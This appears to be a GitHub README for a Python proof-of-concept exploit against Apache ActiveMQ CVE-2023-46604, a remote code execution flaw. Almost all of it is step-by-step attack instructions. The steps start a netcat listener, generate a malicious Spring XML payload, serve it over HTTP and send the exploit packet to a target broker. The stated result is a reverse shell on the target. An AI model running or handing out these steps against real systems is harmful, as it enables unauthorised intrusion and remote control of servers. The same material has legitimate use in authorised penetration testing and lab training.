Python proof-of-concept exploit for Apache ActiveMQ CVE-2023-46604 (Remote Code Execution).
This implementation generates the malicious Spring XML payload and sends the exploit packet to the broker.
Demo Video (YouTube Shorts):
# 1. Clone this repository
git clone https://github.com/strikoder/CVE-2023-46604-ActiveMQ-RCE-Python.git
cd CVE-2023-46604-ActiveMQ-RCE-Python
# 2. Start a listener on your machine
# let's say 1001 for example lool
nc -nvlp 1001
# 3. Generate the malicious XML file
# Replace 10.10.14.31 with your IP, and 1001 with your listener port
python3 generate_poc.py -i $YOUR_IP -p 1001
# 4. Start a simple HTTP server in the same folder (to serve the XML payload)
# choose whatever port you want B00B
python3 -m http.server 2002
# 5. Run the exploit
python3 main.py -i $TARGET_IP -u http://$YOUR_IP:2002/poc-linux.xml
Enjoy your shell :)